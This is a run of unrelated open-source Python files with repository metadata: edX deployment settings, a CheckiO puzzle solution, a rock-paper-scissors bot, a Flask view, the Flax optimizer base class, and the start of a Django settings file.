# API Key for inbound requests from Notifier service
EDX_API_KEY = AUTH_TOKENS.get("EDX_API_KEY")
# Celery Broker
CELERY_BROKER_TRANSPORT = ENV_TOKENS.get("CELERY_BROKER_TRANSPORT", "")
CELERY_BROKER_HOSTNAME = ENV_TOKENS.get("CELERY_BROKER_HOSTNAME", "")
CELERY_BROKER_VHOST = ENV_TOKENS.get("CELERY_BROKER_VHOST", "")
CELERY_BROKER_USER = AUTH_TOKENS.get("CELERY_BROKER_USER", "")
CELERY_BROKER_PASSWORD = AUTH_TOKENS.get("CELERY_BROKER_PASSWORD", "")
BROKER_URL = "{0}://{1}:{2}@{3}/{4}".format(CELERY_BROKER_TRANSPORT,
CELERY_BROKER_USER,
CELERY_BROKER_PASSWORD,
CELERY_BROKER_HOSTNAME,
CELERY_BROKER_VHOST)
# upload limits
STUDENT_FILEUPLOAD_MAX_SIZE = ENV_TOKENS.get("STUDENT_FILEUPLOAD_MAX_SIZE", STUDENT_FILEUPLOAD_MAX_SIZE)
# Event tracking
TRACKING_BACKENDS.update(AUTH_TOKENS.get("TRACKING_BACKENDS", {}))
EVENT_TRACKING_BACKENDS.update(AUTH_TOKENS.get("EVENT_TRACKING_BACKENDS", {}))
TRACKING_SEGMENTIO_WEBHOOK_SECRET = AUTH_TOKENS.get(
"TRACKING_SEGMENTIO_WEBHOOK_SECRET",
TRACKING_SEGMENTIO_WEBHOOK_SECRET
)
TRACKING_SEGMENTIO_ALLOWED_TYPES = ENV_TOKENS.get("TRACKING_SEGMENTIO_ALLOWED_TYPES", TRACKING_SEGMENTIO_ALLOWED_TYPES)
TRACKING_SEGMENTIO_DISALLOWED_SUBSTRING_NAMES = ENV_TOKENS.get(
"TRACKING_SEGMENTIO_DISALLOWED_SUBSTRING_NAMES",
TRACKING_SEGMENTIO_DISALLOWED_SUBSTRING_NAMES
)
TRACKING_SEGMENTIO_SOURCE_MAP = ENV_TOKENS.get("TRACKING_SEGMENTIO_SOURCE_MAP", TRACKING_SEGMENTIO_SOURCE_MAP)
# Student identity verification settings
VERIFY_STUDENT = AUTH_TOKENS.get("VERIFY_STUDENT", VERIFY_STUDENT)
# Grades download
GRADES_DOWNLOAD_ROUTING_KEY = HIGH_MEM_QUEUE
GRADES_DOWNLOAD = ENV_TOKENS.get("GRADES_DOWNLOAD", GRADES_DOWNLOAD)
##### ORA2 ######
# Prefix for uploads of example-based assessment AI classifiers
# This can be used to separate uploads for different environments
# within the same S3 bucket.
ORA2_FILE_PREFIX = ENV_TOKENS.get("ORA2_FILE_PREFIX", ORA2_FILE_PREFIX)
##### ACCOUNT LOCKOUT DEFAULT PARAMETERS #####
MAX_FAILED_LOGIN_ATTEMPTS_ALLOWED = ENV_TOKENS.get("MAX_FAILED_LOGIN_ATTEMPTS_ALLOWED", 5)
MAX_FAILED_LOGIN_ATTEMPTS_LOCKOUT_PERIOD_SECS = ENV_TOKENS.get("MAX_FAILED_LOGIN_ATTEMPTS_LOCKOUT_PERIOD_SECS", 15 * 60)
MICROSITE_CONFIGURATION = ENV_TOKENS.get('MICROSITE_CONFIGURATION', {})
MICROSITE_ROOT_DIR = path(ENV_TOKENS.get('MICROSITE_ROOT_DIR', ''))
#### PASSWORD POLICY SETTINGS #####
PASSWORD_MIN_LENGTH = ENV_TOKENS.get("PASSWORD_MIN_LENGTH")
PASSWORD_MAX_LENGTH = ENV_TOKENS.get("PASSWORD_MAX_LENGTH")
PASSWORD_COMPLEXITY = ENV_TOKENS.get("PASSWORD_COMPLEXITY", {})
PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD = ENV_TOKENS.get("PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD")
PASSWORD_DICTIONARY = ENV_TOKENS.get("PASSWORD_DICTIONARY", [])
### INACTIVITY SETTINGS ####
SESSION_INACTIVITY_TIMEOUT_IN_SECONDS = AUTH_TOKENS.get("SESSION_INACTIVITY_TIMEOUT_IN_SECONDS")
##### LMS DEADLINE DISPLAY TIME_ZONE #######
TIME_ZONE_DISPLAYED_FOR_DEADLINES = ENV_TOKENS.get("TIME_ZONE_DISPLAYED_FOR_DEADLINES",
TIME_ZONE_DISPLAYED_FOR_DEADLINES)
##### X-Frame-Options response header settings #####
X_FRAME_OPTIONS = ENV_TOKENS.get('X_FRAME_OPTIONS', X_FRAME_OPTIONS)
##### Third-party auth options ################################################
THIRD_PARTY_AUTH = AUTH_TOKENS.get('THIRD_PARTY_AUTH', THIRD_PARTY_AUTH)
##### OAUTH2 Provider ##############
if FEATURES.get('ENABLE_OAUTH2_PROVIDER'):
OAUTH_OIDC_ISSUER = ENV_TOKENS['OAUTH_OIDC_ISSUER']
OAUTH_ENFORCE_SECURE = ENV_TOKENS.get('OAUTH_ENFORCE_SECURE', True)
OAUTH_ENFORCE_CLIENT_SECURE = ENV_TOKENS.get('OAUTH_ENFORCE_CLIENT_SECURE', True)
##### ADVANCED_SECURITY_CONFIG #####
ADVANCED_SECURITY_CONFIG = ENV_TOKENS.get('ADVANCED_SECURITY_CONFIG', {})
##### GOOGLE ANALYTICS IDS #####
GOOGLE_ANALYTICS_ACCOUNT = AUTH_TOKENS.get('GOOGLE_ANALYTICS_ACCOUNT')
GOOGLE_ANALYTICS_LINKEDIN = AUTH_TOKENS.get('GOOGLE_ANALYTICS_LINKEDIN')
##### OPTIMIZELY PROJECT ID #####
OPTIMIZELY_PROJECT_ID = AUTH_TOKENS.get('OPTIMIZELY_PROJECT_ID', OPTIMIZELY_PROJECT_ID)
#### Course Registration Code length ####
REGISTRATION_CODE_LENGTH = ENV_TOKENS.get('REGISTRATION_CODE_LENGTH', 8)
# REGISTRATION CODES DISPLAY INFORMATION
INVOICE_CORP_ADDRESS = ENV_TOKENS.get('INVOICE_CORP_ADDRESS', INVOICE_CORP_ADDRESS)
INVOICE_PAYMENT_INSTRUCTIONS = ENV_TOKENS.get('INVOICE_PAYMENT_INSTRUCTIONS', INVOICE_PAYMENT_INSTRUCTIONS)
# Which access.py permission names to check;
# We default this to the legacy permission 'see_exists'.
COURSE_CATALOG_VISIBILITY_PERMISSION = ENV_TOKENS.get(
'COURSE_CATALOG_VISIBILITY_PERMISSION',
COURSE_CATALOG_VISIBILITY_PERMISSION
)
COURSE_ABOUT_VISIBILITY_PERMISSION = ENV_TOKENS.get(
'COURSE_ABOUT_VISIBILITY_PERMISSION',
COURSE_ABOUT_VISIBILITY_PERMISSION
)
#date format the api will be formatting the datetime values
API_DATE_FORMAT = '%Y-%m-%d'
API_DATE_FORMAT = ENV_TOKENS.get('API_DATE_FORMAT', API_DATE_FORMAT)
# Enrollment API Cache Timeout
ENROLLMENT_COURSE_DETAILS_CACHE_TIMEOUT = ENV_TOKENS.get('ENROLLMENT_COURSE_DETAILS_CACHE_TIMEOUT', 60)
# PDF RECEIPT/INVOICE OVERRIDES
PDF_RECEIPT_TAX_ID = ENV_TOKENS.get('PDF_RECEIPT_TAX_ID', PDF_RECEIPT_TAX_ID)
PDF_RECEIPT_FOOTER_TEXT = ENV_TOKENS.get('PDF_RECEIPT_FOOTER_TEXT', PDF_RECEIPT_FOOTER_TEXT)
PDF_RECEIPT_DISCLAIMER_TEXT = ENV_TOKENS.get('PDF_RECEIPT_DISCLAIMER_TEXT', PDF_RECEIPT_DISCLAIMER_TEXT)
PDF_RECEIPT_BILLING_ADDRESS = ENV_TOKENS.get('PDF_RECEIPT_BILLING_ADDRESS', PDF_RECEIPT_BILLING_ADDRESS)
PDF_RECEIPT_TERMS_AND_CONDITIONS = ENV_TOKENS.get('PDF_RECEIPT_TERMS_AND_CONDITIONS', PDF_RECEIPT_TERMS_AND_CONDITIONS)
PDF_RECEIPT_TAX_ID_LABEL = ENV_TOKENS.get('PDF_RECEIPT_TAX_ID_LABEL', PDF_RECEIPT_TAX_ID_LABEL)
PDF_RECEIPT_LOGO_PATH = ENV_TOKENS.get('PDF_RECEIPT_LOGO_PATH', PDF_RECEIPT_LOGO_PATH)
PDF_RECEIPT_COBRAND_LOGO_PATH = ENV_TOKENS.get('PDF_RECEIPT_COBRAND_LOGO_PATH', PDF_RECEIPT_COBRAND_LOGO_PATH)
PDF_RECEIPT_LOGO_HEIGHT_MM = ENV_TOKENS.get('PDF_RECEIPT_LOGO_HEIGHT_MM', PDF_RECEIPT_LOGO_HEIGHT_MM)
PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM = ENV_TOKENS.get(
'PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM', PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM
)
if FEATURES.get('ENABLE_COURSEWARE_SEARCH') or FEATURES.get('ENABLE_DASHBOARD_SEARCH'):
# Use ElasticSearch as the search engine herein
SEARCH_ENGINE = "search.elastic.ElasticSearchEngine"
# Facebook app
FACEBOOK_API_VERSION = AUTH_TOKENS.get("FACEBOOK_API_VERSION")
FACEBOOK_APP_SECRET = AUTH_TOKENS.get("FACEBOOK_APP_SECRET")
FACEBOOK_APP_ID = AUTH_TOKENS.get("FACEBOOK_APP_ID")
XBLOCK_SETTINGS = ENV_TOKENS.get('XBLOCK_SETTINGS', {})
##### CDN EXPERIMENT/MONITORING FLAGS #####
CDN_VIDEO_URLS = ENV_TOKENS.get('CDN_VIDEO_URLS', CDN_VIDEO_URLS)
ONLOAD_BEACON_SAMPLE_RATE = ENV_TOKENS.get('ONLOAD_BEACON_SAMPLE_RATE', ONLOAD_BEACON_SAMPLE_RATE)
##### ECOMMERCE API CONFIGURATION SETTINGS #####
ECOMMERCE_API_URL = ENV_TOKENS.get('ECOMMERCE_API_URL', ECOMMERCE_API_URL)
ECOMMERCE_API_SIGNING_KEY = AUTH_TOKENS.get('ECOMMERCE_API_SIGNING_KEY', ECOMMERCE_API_SIGNING_KEY)
ECOMMERCE_API_TIMEOUT = ENV_TOKENS.get('ECOMMERCE_API_TIMEOUT', ECOMMERCE_API_TIMEOUT)
##### Custom Courses for EdX #####
if FEATURES.get('CUSTOM_COURSES_EDX'):
INSTALLED_APPS += ('ccx',)
MIDDLEWARE_CLASSES += ('ccx.overrides.CcxMiddleware',)
FIELD_OVERRIDE_PROVIDERS += (
'ccx.overrides.CustomCoursesForEdxOverrideProvider',
)
##### Individual Due Date Extensions #####
if FEATURES.get('INDIVIDUAL_DUE_DATES'):
FIELD_OVERRIDE_PROVIDERS += (
'courseware.student_field_overrides.IndividualStudentOverrideProvider',
)
# PROFILE IMAGE CONFIG
PROFILE_IMAGE_BACKEND = ENV_TOKENS.get('PROFILE_IMAGE_BACKEND', PROFILE_IMAGE_BACKEND)
PROFILE_IMAGE_SECRET_KEY = AUTH_TOKENS.get('PROFILE_IMAGE_SECRET_KEY', PROFILE_IMAGE_SECRET_KEY)
PROFILE_IMAGE_MAX_BYTES = ENV_TOKENS.get('PROFILE_IMAGE_MAX_BYTES', PROFILE_IMAGE_MAX_BYTES)
PROFILE_IMAGE_MIN_BYTES = ENV_TOKENS.get('PROFILE_IMAGE_MIN_BYTES', PROFILE_IMAGE_MIN_BYTES)
if FEATURES['IS_EDX_DOMAIN']:
PROFILE_IMAGE_DEFAULT_FILENAME = 'images/edx-theme/default-profile'
else:
PROFILE_IMAGE_DEFAULT_FILENAME = ENV_TOKENS.get('PROFILE_IMAGE_DEFAULT_FILENAME', PROFILE_IMAGE_DEFAULT_FILENAME)
AUTHENTICATION_BACKENDS = (
'social.backends.defy.DefyVenturesOAuth2Backend',
)
|
DefyVentures/edx-platform
|
lms/envs/aws.py
|
Python
|
agpl-3.0
| 27,732
|
from itertools import combinations
from math import pi, acos, hypot
def dist(a, b):
return hypot(a[0]-b[0], a[1]-b[1])
def area(r):
return pi*r**2
def checkio(data):
blackHoles = [list(bh) for bh in data]
while 1:
for bh in sorted(combinations(blackHoles, 2), key=lambda c: dist(*c)):
d = dist(*bh)
skinny, fatty = sorted(bh, key=lambda B: B[2])
r, R = skinny[2], fatty[2]
s1, s2 = map(area, [r, R])
if d+r < R:
# skinny is inside fatty
i = s1
elif d < R+r < R+R:
# the blackholes intersect
i = r**2*acos((d**2+r**2-R**2)/2/d/r) + \
R**2*acos((d**2-r**2+R**2)/2/d/R) - \
((-d+r+R)*(d+r-R)*(d-r+R)*(d+r+R))**.5/2
else:
# no intersection
i = 0
if i/s1 >= .55 and s2/s1 >= 1.2:
fatty[2] = ((s2+s1)/pi)**.5
blackHoles.remove(skinny)
break
else:
return blackHoles
|
Pouf/CodingCompetition
|
CiO/black-holes.py
|
Python
|
mit
| 1,087
|
#!/usr/bin/env python
import sys
for _ in range(101):
print "P\n."
sys.stdout.flush()
|
ethercrow/ai-challenger
|
game-rps/paper.py
|
Python
|
mit
| 95
|
from flask import request, render_template
from ..models import picture_list
from flask.ext.login import current_user
def gallery():
return render_template('gallery.html', active_page='gallery',pictures=picture_list)
|
PhoenixRacing/PhoenixRacingWebApp-noregrets
|
application/controllers/gallery.py
|
Python
|
bsd-3-clause
| 218
|
# Copyright 2022 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Flax Optimizer api."""
import dataclasses
from typing import Any, List, Tuple
import warnings
from .. import jax_utils
from .. import serialization
from .. import struct
from .. import traverse_util
import jax
import jax.numpy as jnp
from ..core import FrozenDict, unfreeze
# Backwards compatibility symbol import.
ModelParamTraversal = traverse_util.ModelParamTraversal
@struct.dataclass
class OptimizerState:
step: jnp.ndarray
param_states: Any
class OptimizerDef:
"""Base class for an optimizer defintion, which specifies the initialization and gradient application logic.
See docstring of :class:`Optimizer` for more details.
"""
def __init__(self, hyper_params):
self.hyper_params = hyper_params
warnings.warn(
'Use `optax` instead of `flax.optim`. Refer to the update guide '
'https://flax.readthedocs.io/en/latest/howtos/optax_update_guide.html '
'for detailed instructions.', DeprecationWarning)
def apply_param_gradient(self, step, hyper_params, param, state, grad):
"""Apply a gradient for a single parameter.
Args:
step: the current step of the optimizer.
hyper_params: a named tuple of hyper parameters.
param: the parameter that should be updated.
state: a named tuple containing the state for this parameter
grad: the gradient tensor for the parameter.
Returns:
A tuple containing the new parameter and the new state.
"""
raise NotImplementedError()
def init_param_state(self, param):
"""Initializes the state for a parameter.
Args:
param: the parameter for which to initialize the state.
Returns:
A named tuple containing the initial optimization state for the parameter.
"""
raise NotImplementedError()
def apply_gradient(self, hyper_params, params, state, grads):
"""Applies a gradient for a set of parameters.
Args:
hyper_params: a named tuple of hyper parameters.
params: the parameters that should be updated.
state: a named tuple containing the state of the optimizer
grads: the gradient tensors for the parameters.
Returns:
A tuple containing the new parameters and the new optimizer state.
"""
step = state.step
params_flat, treedef = jax.tree_flatten(params)
states_flat = treedef.flatten_up_to(state.param_states)
grads_flat = treedef.flatten_up_to(grads)
out = [self.apply_param_gradient(step, hyper_params, param, state, grad)
for param, state, grad in zip(params_flat, states_flat, grads_flat)]
new_params_flat, new_states_flat = list(zip(*out)) if out else ((), ())
new_params = jax.tree_unflatten(treedef, new_params_flat)
new_param_states = jax.tree_unflatten(treedef, new_states_flat)
new_state = OptimizerState(step + 1, new_param_states)
return new_params, new_state
def init_state(self, params):
param_states = jax.tree_map(self.init_param_state, params)
state = OptimizerState(jnp.asarray(0, dtype=jnp.int32), param_states)
return state
def update_hyper_params(self, **hyper_param_overrides):
"""Updates the hyper parameters with a set of overrides.
This method is called from Optimizer apply_gradient to create the
hyper parameters for a specific optimization step.
Args:
**hyper_param_overrides: the hyper parameters updates
will override the defaults specified in the `OptimizerDef`.
Pass `hyper_params=...` to replace all hyper parameters.
Returns:
The new hyper parameters.
"""
hp = hyper_param_overrides.pop('hyper_params', self.hyper_params)
if hyper_param_overrides:
hp = hp.replace(**hyper_param_overrides)
return hp
def create(self, target, focus: 'ModelParamTraversal' = None):
"""Creates a new optimizer for the given target.
See docstring of :class:`Optimizer` for more details.
Args:
target: the object to be optimized. This is typically a variable dict
returned by `flax.linen.Module.init()`, but it can also be a container
of variables dicts, e.g. `(v1, v2)` and `('var1': v1, 'var2': v2)`
are valid inputs as well.
focus: a `flax.traverse_util.Traversal` that selects which subset of
the target is optimized. See docstring of :class:`MultiOptimizer`
for an example of how to define a `Traversal` object.
Returns:
An instance of `Optimizer`.
"""
opt_def = self
if focus:
opt_def = MultiOptimizer((focus, opt_def))
state = opt_def.init_state(target)
return Optimizer(opt_def, state, target)
def state_dict(self, target, state):
return serialization.to_state_dict({
'target': serialization.to_state_dict(target),
'state': serialization.to_state_dict(state)
})
def restore_state(self, opt_target, opt_state, state_dict):
"""Restore the optimizer target and state from the state dict.
This function accepts the current optimizer target and state. This
lets us know the exact structure of the optimizer target and state,
as well as lets us add assertions that shapes and dtypes don't change.
In practice, no values in `opt_target` and `opt_state` are actually
used. Only the tree structure, shapes and types.
Args:
opt_target: the optimizer target.
opt_state: the optimizer state.
state_dict: the state dict containing the desired new state of the
optimizer.
Returns:
a tuple of the optimizer target and state with the restored values from
the state dict.
"""
opt_target = serialization.from_state_dict(opt_target, state_dict['target'])
opt_state = serialization.from_state_dict(opt_state, state_dict['state'])
return opt_target, opt_state
class _NoAux:
"""Placeholder used to indicate a lack of auxilairy outputs."""
pass
class Optimizer(struct.PyTreeNode):
"""
Flax optimizers are created using the :class:`OptimizerDef` class. That class
specifies the initialization and gradient application logic. Creating an
optimizer using the :meth:`OptimizerDef.create` method will result in an
instance of the :class:`Optimizer` class, which encapsulates the optimization
target and state. The optimizer is updated using the method
:meth:`apply_gradient`.
Example of constructing an optimizer for a model::
from flax import optim
optimizer_def = optim.GradientDescent(learning_rate=0.1)
optimizer = optimizer_def.create(model)
The optimizer is then used in a training step as follows::
def train_step(optimizer, data):
def loss_fn(model):
y = model(data)
loss = ... # compute the loss
aux = ... # compute auxiliary outputs (eg. training metrics)
return loss, aux
grad_fn = jax.value_and_grad(loss_fn, has_aux=True)
(loss, aux), grad = grad_fn(optimizer.target)
new_optimizer = optimizer.apply_gradient(grad)
return new_optimizer, loss, aux
Distributed training only requires a few extra additions::
from flax import optim
optimizer_def = optim.GradientDescent(learning_rate=0.1)
optimizer = optimizer_def.create(model)
optimizer = jax_utils.replicate(optimizer)
def train_step(optimizer, data):
def loss_fn(model):
y = model(data)
loss = ... # compute the loss
aux = ... # compute auxiliary outputs (eg. training metrics)
return loss, aux
grad_fn = jax.value_and_grad(loss_fn, has_aux=True)
(loss, aux), grad = grad_fn(optimizer.target)
grad = jax.lax.pmean(grad, 'batch')
new_optimizer = optimizer.apply_gradient(grad)
return new_optimizer, loss, aux
distributed_train_step = jax.pmap(train_step, axis_name='batch')
Attributes:
optimizer_def: The optimizer definition.
state: The initial state of the optimizer.
target: The target to optimizer."""
optimizer_def: OptimizerDef = struct.field(pytree_node=False)
state: Any = struct.field(pytree_node=True)
target: Any = struct.field(pytree_node=True)
def apply_gradient(self, grads, **hyper_param_overrides):
"""Applies a pytree of gradients to the target.
Args:
grads: A pytree of gradients.
**hyper_param_overrides: the hyper parameters passed to apply_gradient
will override the defaults specified in the `OptimizerDef`.
Pass `hyper_params=...` to replace all hyper parameters.
Returns:
A new optimizer with the updated target and state.
"""
hyper_params = self.optimizer_def.update_hyper_params(
**hyper_param_overrides)
new_target, new_state = self.optimizer_def.apply_gradient(
hyper_params, self.target, self.state, grads)
return self.replace(target=new_target, state=new_state)
def compute_gradient(self, loss_fn):
"""Computes gradient of loss_fn.
DEPRECATION WARNING:
compute_gradient() is deprecated.
Use jax.grad() or jax.value_and_grad() instead.
Args:
loss_fn: a function that receives the target and returns a loss or a
tuple of the loss and auxiliary outputs.
Returns:
A tuple consisting of the loss, auxiliary outputs if any,
and a list of gradient.
"""
warnings.warn('compute_gradient() will be removed soon.'
' Use jax.grad() or jax.value_and_grad()'
'instead.',
DeprecationWarning)
def loss_wrapper(target):
loss_and_aux = loss_fn(target)
if isinstance(loss_and_aux, jnp.ndarray):
return loss_and_aux, _NoAux
else:
return loss_and_aux
grad_fn = jax.value_and_grad(loss_wrapper, has_aux=True)
(loss, aux), grad = grad_fn(self.target)
if aux is _NoAux:
return loss, grad
else:
return loss, aux, grad
compute_gradients = compute_gradient
def optimize(self, loss_fn, **hyper_param_overrides):
"""Optimizes the target with respect to a loss function.
DEPRECATION WARNING:
optimize() is deprecated.
Use jax.grad() or jax.value_and_grad() and apply_gradient() instead.
Args:
loss_fn: function that receives the target and returns a loss or a
tuple of the loss and auxiliary outputs.
**hyper_param_overrides: the hyper parameters passed to apply_gradient
will override the defaults specified in the `OptimizerDef`.
Pass `hyper_params=...` to replace all hyper parameters.
Returns:
A tuple consisting of the new optimizer, the loss,
and the auxiliary outputs if any.
"""
warnings.warn('optimize() will be removed soon.'
' Use jax.grad() or jax.value_and_grad()'
'and apply_gradient() instead.',
DeprecationWarning)
output_and_grad = self.compute_gradient(loss_fn)
grad = output_and_grad[-1]
optimizer = self.apply_gradient(grad, **hyper_param_overrides)
return (optimizer,) + output_and_grad[:-1]
def replicate(self, devices=None, axis_name='batch'):
"""Replicates an optimizer for data parallel training.
A replicated optimizer will automatically average the gradients across
devices. For this to work correctly the optimize method should be called
within the context of a `jax.pmap` call with the correct axis_name.
DEPRECATION WARNING:
replicate() is deprecated.
Use jax_utils.replicate() instead.
Args:
devices: an optional list of devices defining which devices this optimizer
is replicated to (default: all local devices).
axis_name: the axis_name used for gradient averaging across devices.
Returns:
The replicated optimizer.
"""
if devices is None:
devices = jax.local_devices()
optimizer_def = ReplicatedOptimizer(self.optimizer_def, devices, axis_name)
optimizer = jax_utils.replicate(self, devices=devices)
return optimizer.replace(optimizer_def=optimizer_def)
def unreplicate(self):
"""Un-replicates an optimizer.
This will create a new optimizer with the target and state of the first
device this optimizer was replicated to. After this call the optimizer
and the target can be used outside of a `jax.pmap` call.
DEPRECATION WARNING:
unreplicate() is deprecated.
Use jax_utils.unreplicate() instead.
Returns:
The optimizer that is no longer replicated.
"""
if not isinstance(self.optimizer_def, ReplicatedOptimizer):
raise ValueError('Cannot unreplicate an optimizer '
'that is not replicated.')
optimizer_def = self.optimizer_def.optimizer_def
optimizer = jax_utils.unreplicate(self)
return optimizer.replace(optimizer_def=optimizer_def)
def state_dict(self):
return self.optimizer_def.state_dict(self.target, self.state)
def restore_state(self, state):
target, state = self.optimizer_def.restore_state(
self.target, self.state, state)
return self.replace(target=target, state=state)
# Optimizer serialization is handled by the state_dict and restore_dict methods
# of the OptimizerDef. Currently, this is used to store only a single copy of
# a replicated optimizer.
serialization.register_serialization_state(
Optimizer, Optimizer.state_dict, Optimizer.restore_state,
override=True)
class ReplicatedOptimizer(OptimizerDef):
"""Data parallel optimizer.
DEPRECATION WARNING:
ReplicatedOptimizer will be removed soon.
Use `jax_utils.replicate(optimizer)` and `lax.pmean(grad)` to explicitly
control the replication of the the optimizer and the cross replica averaging
over gradients, respectively.
"""
def __init__(self, optimizer_def, devices=None, axis_name='batch'):
super().__init__(optimizer_def.hyper_params)
if devices is None:
devices = jax.local_devices()
self.optimizer_def = optimizer_def
self.devices = devices
self.axis_name = axis_name
def init_state(self, params):
return self.optimizer_def.init_state(params)
def _cross_replica_mean(self, grad):
axis_size = jax.lax.psum(1, axis_name=self.axis_name)
return jax.lax.psum(grad, axis_name=self.axis_name) / axis_size
def apply_gradient(self, hyper_params, params, state, grads):
grads = jax.tree_map(self._cross_replica_mean, grads)
return self.optimizer_def.apply_gradient(hyper_params, params, state, grads)
def update_hyper_params(self, **hyper_param_overrides):
return self.optimizer_def.update_hyper_params(**hyper_param_overrides)
def state_dict(self, target, state):
state_dict = self.optimizer_def.state_dict(target, state)
# only the first copy of the parameters and optimizer state are stored.
state_dict = jax.tree_map(lambda x: x[0], state_dict)
return state_dict
def restore_state(self, target, opt_state, state_dict):
# replicate the parameters and state to all devices.
state_dict = jax_utils.replicate(state_dict, devices=self.devices)
return self.optimizer_def.restore_state(target, opt_state, state_dict)
@dataclasses.dataclass
class _ShapeDtype:
shape: Any
dtype: Any
_value: Any
_indices: List[int]
@classmethod
def create(cls, value):
if not isinstance(value, jnp.ndarray):
value = jnp.array(value)
return cls(shape=value.shape, dtype=value.dtype, _value=value, _indices=[])
class MultiOptimizer(OptimizerDef):
"""
A MultiOptimizer is subclass of :class:`OptimizerDef` and useful for applying
separate optimizer algorithms to various subsets of the model parameters.
The example below creates two optimizers using
:class:`flax.traverse_util.ModelParamTraversal`:
one to optimize ``kernel`` parameters and to optimize ``bias`` parameters.
Note each optimizer is created with a different learning rate::
kernels = traverse_util.ModelParamTraversal(lambda path, _: 'kernel' in path)
biases = traverse_util.ModelParamTraversal(lambda path, _: 'bias' in path)
kernel_opt = optim.Momentum(learning_rate=0.01)
bias_opt = optim.Momentum(learning_rate=0.1)
opt_def = MultiOptimizer((kernels, kernel_opt), (biases, bias_opt))
optimizer = opt_def.create(model)
In order to train only a subset of the parameters, you can simply use a single
:class:`flax.traverse_util.ModelParamTraversal` instance.
If you want to update the learning rates of both optimizers online with
different learning rate schedules, you should update the learning rates when
applying the gradient. In the following example, the second optimizer is not
doing any optimization during the first 1000 steps::
hparams = optimizer.optimizer_def.hyper_params
new_optimizer = optimizer.apply_gradient(
grads,
hyper_params=[
hparams[0].replace(learning_rate=0.2),
hparams[1].replace(learning_rate=jnp.where(step < 1000, 0., lr)),
])
"""
def __init__(
self,
*traversals_and_optimizers: Tuple[traverse_util.Traversal, OptimizerDef]):
"""Create a new MultiOptimizer.
See docstring of :class:`MultiOptimizer` for more details.
Args:
*traversals_and_optimizers: pairs of flax.traverse_util.Traversal and
`flax.optim.OptimizerDef` instances.
"""
traversals, sub_optimizers = zip(*traversals_and_optimizers)
hyper_params = [opt.hyper_params for opt in sub_optimizers]
super().__init__(hyper_params)
self.traversals = traversals
self.sub_optimizers = sub_optimizers
def init_state(self, params):
param_states = jax.tree_map(_ShapeDtype.create, params)
overlap = False
for idx, (traversal,
opt) in enumerate(zip(self.traversals, self.sub_optimizers)):
for match in traversal.iterate(param_states):
match._indices.append(idx)
overlap |= len(match._indices) > 1
if overlap:
raise ValueError(
'Multiple optimizers match the same leaves : ' +
str(jax.tree_map(lambda match: match._indices, param_states)))
for traversal, opt in zip(self.traversals, self.sub_optimizers):
param_states = traversal.update(lambda x: opt.init_param_state(x._value), param_states)
# Use None as initial state for params that are not optimized by any sub optimizer.
param_states = jax.tree_map(lambda x: None if isinstance(x, _ShapeDtype) else x, param_states)
return OptimizerState(jnp.asarray(0, dtype=jnp.int32), param_states)
def apply_gradient(self, hyper_params, params, state, grads):
new_params = params
it = zip(self.traversals, self.sub_optimizers, hyper_params)
new_param_states = jax.tree_map(_ShapeDtype.create, params)
for focus, opt, hp in it:
ps = tuple(focus.iterate(params))
gs = tuple(focus.iterate(grads))
ss = tuple(focus.iterate(state.param_states))
prev_ss = OptimizerState(state.step, ss)
new_ps, new_ss = opt.apply_gradient(hp, ps, prev_ss, gs)
new_params = focus.set(list(new_ps), new_params)
new_param_states = focus.set(list(new_ss.param_states), new_param_states)
# Update state to None when param is not optimized by any sub optimizer.
new_param_states = jax.tree_map(lambda x: None if isinstance(x, _ShapeDtype) else x, new_param_states)
return new_params, OptimizerState(state.step + 1, new_param_states)
def update_hyper_params(self, **hyper_param_overrides):
"""Updates the hyper parameters with a set of overrides.
This method is called from :meth:`Optimizer.apply_gradient` to create the
hyper parameters for a specific optimization step.
MultiOptimizer will apply the overrides for each sub optimizer.
Args:
**hyper_param_overrides: the hyper parameters updates
will override the defaults specified in the `OptimizerDef`.
Pass `hyper_params=...` to replace all hyper parameters.
Returns:
The new hyper parameters.
"""
hps = hyper_param_overrides.pop('hyper_params', self.hyper_params)
if hyper_param_overrides:
hps = [hp.replace(**hyper_param_overrides) for hp in hps]
return hps
|
google/flax
|
flax/optim/base.py
|
Python
|
apache-2.0
| 20,558
|
# Django settings for seamless project.
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'database.sql3', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.4/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
